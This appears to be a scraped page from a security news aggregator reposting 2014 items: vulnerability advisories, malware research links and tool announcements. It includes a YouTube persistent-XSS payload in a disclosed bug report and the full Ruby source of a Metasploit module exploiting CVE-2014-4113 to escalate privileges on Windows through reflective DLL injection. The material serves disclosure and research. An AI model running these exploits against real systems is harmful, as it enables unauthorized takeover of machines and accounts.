Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

Google Youtube - Filter Bypass & Persistent Vulnerability [9-5942000004564] (PoC Video Demonstration)

October 27, 2014, 9:54 am
$
0
0
Document Title:
===============
Google Youtube - Filter Bypass & Persistent Vulnerability [9-5942000004564] (PoC Video Demonstration)


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=1352

Google Security ID: [9-5942000004564]

View: https://www.youtube.com/watch?v=656LM9zGLxc

Article: http://vulnerability-db.com/magazine/articles/2014/10/25/google-youtube-persistent-cross-site-vulnerability-demonstration-video


Release Date:
=============
2014-10-25


Vulnerability Laboratory ID (VL-ID):
====================================
1352


Common Vulnerability Scoring System:
====================================
3.9


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Offensiv


Severity Level:
===============
Medium


Technical Details & Description:
================================
The independent vulnerability researcher jasminder pal has discovered a persistent cross site scripting vulnerability in the google youtube ui.
By usage of a filter bypass method the issue becomes exploitable in different application layers that are connected to the vulnerable values.
Google security send a reward of 1337$ to the researcher that discovered the vulnerability during the official bug bounty program.

Reproduction Steps :
1. Create a playlist name [ t" onmouseover=alert(/xss/); a=" ] . * Without rectangle braces [ ] .
2. Now there are multiple places where this above js code will execute.
One is Click edit on any of your uploaded video . On editor page click on Add to Playlist.
When you mouseover the playlist name the above js code will execute.
Other locations where the code executes is when an youtube user is uploading a video , there it ask for Add to the playlist.


Credits & Authors:
==================
Jasminder Pal Singh - @singh_jasminder [http://jasminderpalsingh.info]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com                        - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com       - vulnerability-lab.com/contact.php                     - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

COMPANY: Evolution Security GmbH
BUSINESS: www.evolution-sec.com
Search

PHP htaccess injection cheat sheet

October 27, 2014, 9:56 am
$
0
0
Scenario
In a setup of Apache/mod_php an attacker is able to inject .htaccess (or php.ini or apache configuration). The injection directory has AllowOverride Options set (or AllowOverride All, which is very common as well).

more here...........https://github.com/sektioneins/pcc/wiki/PHP-htaccess-injection-cheat-sheet

Closures, Objects, and the Fauna of the Heap

October 27, 2014, 1:57 pm
$
0
0
The last post in this series looks at closures, objects, and other creatures roaming beyond the stack. Much of what we’ll see is language neutral, but I’ll focus on JavaScript with a dash of C.

more here........http://duartes.org/gustavo/blog/post/closures-objects-heap/

Crypto-Ransomware Running Rampant

October 27, 2014, 1:58 pm
$
0
0
There's no doubt that ransomware is one of the most popular malware threats of 2014. Zscaler is not alone in this opinion, as other security firms have observed up to a 700% increase in infection rates to ransom-like malicious activity on victim PCs.  It's no wonder the attacks are so effective when for example, the delivery mechanism is designed to impersonate a legitimate service such as a harmless eFax.

more here..........http://research.zscaler.com/2014/10/crypto-ransomware-running-rampant.html

ASP Backdoors? Sure! It’s not just about PHP

October 27, 2014, 2:00 pm
$
0
0
I recently came to the realization that it might appear that we’re partial to PHP and WordPress. This realization has brought about an overwhelming need to correct that perception. While they do make up an interesting percentage, there are various other platforms and languages that have similar if not more devastating implications.

Take into consideration Microsoft ASP and Windows IIS Web Servers. They too share their burden of infections, yet we don’t give it, rather share, as much as we probably should.

more here.........http://blog.sucuri.net/2014/10/asp-backdoors-its-not-all-about-php.html

TSX improves timing attacks against KASLR

October 27, 2014, 4:36 pm
$
0
0
Mega biblion mega kakon…
… and similarly a long blog is a nuisance, so I managed to squeeze the essence of it into a single sentence, the title. If it is not entirely clear, read on.

more here.................http://labs.bromium.com/2014/10/27/tsx-improves-timing-attacks-against-kaslr/

Men’s Wearhouse Perfect Fit App Vulnerability Exposing Customer Information

October 27, 2014, 4:39 pm
$
0
0
Men’s Wearhouse offers an Android app called Perfect Fit which allows customers to manage their accounts, track their rewards points, receive coupons, etc. As a customer myself, I already had an account with them and decided to review the requests the app was making while logging in and  accessing my information. In doing so, I immediately identified a flaw in their web service’s authentication/session management that exposed the personal information of all of their customers with Perfect Fit accounts.

more here...........http://randywestergren.com/mens-wearhouse-perfect-fit-app-vulnerability-exposing-customer-information/

Paper: Mayhem in the Push Clouds: Understanding and Mitigating Security Hazards in Mobile Push-Messaging Services

October 27, 2014, 4:45 pm
$
0
0
Push messaging is among the most important mobile-cloud services,
offering critical supports to a wide spectrum of mobile apps.
This service needs to coordinate complicated interactions between
developer servers and their apps in a large scale, making it error
prone. With its importance, little has been done, however, to understand
 the security risks of the service. In this paper, we report
the first security analysis on those push-messaging services, which
reveals the pervasiveness of subtle yet significant security flaws in
them, affecting billions of mobile users.

more here.............http://homes.soic.indiana.edu/zhou/files/mobile_cloud.pdf
Search

ScanBox framework – who’s affected, and who’s using it?

October 27, 2014, 4:48 pm
$
0
0
Earlier this year the Japanese language website of one of the world’s largest suppliers of industrial equipment was compromised by a sophisticated threat actor. Usually in such cases an attacker will use their access to place an exploit kit on the compromised website, delivering malware to visitors - a technique commonly referred to as setting up a ‘watering hole’ or ‘strategic web compromise’. In this case however, rather than relying on malware, the exploit kit was a self-contained key logger that recorded all keystrokes the user performed while on the website. AlienVault[1]  produced an excellent write-up on this framework, which the developers named ScanBox.

more here.........http://pwc.blogs.com/cyber_security_updates/2014/10/scanbox-framework-whos-affected-and-whos-using-it-1.html

Kaspersky Hooking Engine Analysis

October 28, 2014, 2:11 am
$
0
0
In this article we will talk about a few hooking techniques used by antivirus software. For the purpose of this analysis the antivirus chosen will be Kaspersky (http://www.kaspersky.com/it/trials PURE 3.0 Total Security), we will deal with various hooking techniques used both at user and kernel mode.

more here.........https://quequero.org/2014/10/kaspersky-hooking-engine-analysis/

Dorothy 2- A malware/botnet analysis framework written in Ruby.

October 28, 2014, 2:17 am
$
0
0
Dorothy2 is a framework created for suspicious binary analysis. It’s main strengths are a very flexible modular environment, and an interactive investigation framework with a particular care of the network analysis. Additionally, it is able to recognise new spawned processes by comparing them with a previously created baseline.

more here.........https://github.com/m4rco-/dorothy2

Cisco ASA SSL VPN Backdoor PoC (CVE-2014-3393)

October 28, 2014, 2:57 am
$
0
0
A coworker and I recently had the opportunity to work with a new vulnerability released at Ruxcon just earlier this month and while we didn't get exactly what we wanted, it was quite interesting.

The conference presentation was titled "Breaking Bricks and Plumbing Pipes: Cisco ASA a Super Mario Adventure" https://ruxcon.org.au/assets/2014/slides/Breaking%20Bricks%20Ruxcon%202014.pdf and was EXTREMELY interesting. The researcher Alec Stuart-Muirk managed the "jailbreak" the ASA and from there do some cool things with it, including a code audit of the publicly facing SSL VPN interface.

more here..........http://breenmachine.blogspot.ca/2014/10/cisco-asa-ssl-vpn-backdoor-poc-cve-2014.html

Memtools Vita 0.3beta (untested)

October 28, 2014, 2:59 am
$
0
0
Allows developers to play with the Vita's WebKit process memory by leveraging a WebKit vuln

more here........https://github.com/BrianBTB/memtools_vita

Metasploit: Windows TrackPopupMenu Win32k NULL Pointer Dereference

October 28, 2014, 3:02 am
$
0
0
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::ReflectiveDLLInjection

  def initialize(info={})
    super(update_info(info, {
      'Name'           => 'Windows TrackPopupMenu Win32k NULL Pointer Dereference',
      'Description'    => %q{
        This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability
        can be triggered through the use of TrackPopupMenu. Under special conditions, the
        NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary
        code execution. This module has been tested successfully on Windows XP SP3, Windows
        2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows
        2008 R2 SP1 64 bits.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown', # vulnerability discovery and exploit in the wild
          'juan vazquez', # msf module (x86 target)
          'Spencer McIntyre' # msf module (x64 target)
        ],
      'Arch'           => [ ARCH_X86, ARCH_X86_64 ],
      'Platform'       => 'win',
      'SessionTypes'   => [ 'meterpreter' ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Targets'        =>
        [
          # Tested on (32 bits):
          # * Windows XP SP3
          # * Windows 2003 SP2
          # * Windows 7 SP1
          # * Windows 2008
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
          # Tested on (64 bits):
          # * Windows 7 SP1
          # * Windows 2008 R2 SP1
          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
        ],
      'Payload'         =>
        {
          'Space'       => 4096,
          'DisableNops' => true
        },
      'References'      =>
        [
          ['CVE', '2014-4113'],
          ['OSVDB', '113167'],
          ['BID', '70364'],
          ['MSB', 'MS14-058'],
          ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/']
        ],
      'DisclosureDate' => 'Oct 14 2014',
      'DefaultTarget'  => 0
    }))
  end

  def check
    os = sysinfo["OS"]

    if os !~ /windows/i
      return Exploit::CheckCode::Unknown
    end

    if sysinfo["Architecture"] =~ /(wow|x)64/i
      arch = ARCH_X86_64
    elsif sysinfo["Architecture"] =~ /x86/i
      arch = ARCH_X86
    end

    file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
    major, minor, build, revision, branch = file_version(file_path)
    vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")

    # Neither target suports Windows 8 or 8.1
    return Exploit::CheckCode::Safe if build == 9200
    return Exploit::CheckCode::Safe if build == 9600

    if arch == ARCH_X86
      return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build)
    else
      return Exploit::CheckCode::Detected if build == 7601
    end

    return Exploit::CheckCode::Unknown
  end

  def exploit
    if is_system?
      fail_with(Exploit::Failure::None, 'Session is already elevated')
    end

    if check == Exploit::CheckCode::Safe
      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
    end

    if sysinfo["Architecture"] =~ /wow64/i
      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
    elsif sysinfo["Architecture"] =~ /x64/ && target.arch.first == ARCH_X86
      fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
    elsif sysinfo["Architecture"] =~ /x86/ && target.arch.first == ARCH_X86_64
      fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
    end

    print_status('Launching notepad to host the exploit...')
    notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
    begin
      process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
      print_good("Process #{process.pid} launched.")
    rescue Rex::Post::Meterpreter::RequestError
      # Reader Sandbox won't allow to create a new process:
      # stdapi_sys_process_execute: Operation failed: Access is denied.
      print_status('Operation failed. Trying to elevate the current process...')
      process = client.sys.process.open
    end

    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
    if target.arch.first == ARCH_X86
      dll_file_name = 'cve-2014-4113.x86.dll'
    else
      dll_file_name = 'cve-2014-4113.x64.dll'
    end

    library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4113', dll_file_name)
    library_path = ::File.expand_path(library_path)

    print_status("Injecting exploit into #{process.pid}...")
    exploit_mem, offset = inject_dll_into_process(process, library_path)

    print_status("Exploit injected. Injecting payload into #{process.pid}...")
    payload_mem = inject_into_process(process, payload.encoded)

    # invoke the exploit, passing in the address of the payload that
    # we want invoked on successful exploitation.
    print_status('Payload injected. Executing exploit...')
    process.thread.create(exploit_mem + offset, payload_mem)

    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
  end

end



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Dubious MIME - Conflicting Content-Transfer-Encoding

October 28, 2014, 3:31 am
$
0
0
Because of different interpretations of standards in mail clients, IDS/IPS and antivirus products, it is possible to pass malware undetected to the end user. This is especially funny and dangerous if different interpretations happen inside a single product, like in Yahoo! Web Mail.

more here.........http://noxxi.de/research/content-transfer-encoding.html
Search

Fireeye Report: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?

October 28, 2014, 3:33 am
$
0
0
Our clients often ask us to assess the threat Russia poses in cyberspace. Russia has
long been a whispered frontrunner among capable nations for performing
sophisticated network operations. This perception is due in part to the Russian
government’s alleged involvement in the cyber attacks accompanying its invasion of
Georgia in 2008, as well as the rampant speculation that Moscow was behind a
major U.S. Department of Defense network compromise, also in 2008. These
rumored activities, combined with a dearth of hard evidence, have made Russia into
something of a phantom in cyberspace.

more here..........http://www.fireeye.com/resources/pdfs/apt28.pdf

Foxtrot

October 28, 2014, 10:55 am
$
0
0
A simple and secure routing network based on bitcoin cryptography. Foxtrot enables easy p2p communications and has built-in mechanisms for peer discovery, creation of services addressable by public keys, and establishing encrypted connections.

more here........https://github.com/bitpay/foxtrot

Hacking a Reporter: UK Edition

October 28, 2014, 1:08 pm
$
0
0
Over the summer, a U.K. journalist asked the Trustwave SpiderLabs team to target her with an online attack. You might remember that we did the same in 2013 by setting our sites on a U.S.-based reporter.

This scenario, however, would differ from the first. The reporter, Sophie, was our only target. Co-workers, company or family were off limits. Sophie wrote about the experience from her perspective here. Below, we’ll tell the story from the perspective of Trustwave SpiderLabs, playing the role of “theoretical” attacker.

more here.........http://blog.spiderlabs.com/2014/10/hacking-a-reporter-uk-edition.html

CryptoAttacker

October 28, 2014, 1:09 pm
$
0
0
CryptoAttacker helps detect and exploit some common crypto flaws.

Active Scanning to detect padding Oracle attacks
Active Scanning capabilities to detect input being encrypted with ECB and reflected back (can be slow)
Attack tab to encrypt/decrypt padding oracles
Attack tab to decrypt ECB where you control part of the request

more here.......https://github.com/webstersprodigy/webstersprodigy/tree/master/burp/cryptoAttack

CVE-2014-2718: ASUS wireless router updates vulnerable to a Man in the Middle attack

October 28, 2014, 2:16 pm
$
0
0
Over the past few months I have come across a couple of significant issues with ASUS wireless routers (which to their credit the company has been quick to resolve).

In mid February, I wrote that a substantial portion of ASUS wireless routers would fail to update their firmware. In fact, the "check for update" function would inform the administrator that the router was fully up-to-date, even though it was not. The timing could not have been worse, coming right on the heels of an exploit for a bug in which USB hard drives connected to the router could be accessed from the public Internet, with no login required.

more here.........http://dnlongen.blogspot.com/2014/10/CVE-2014-2718-Asus-RT-MITM.html
Viewing all 8064 articles
Browse latest View live
Search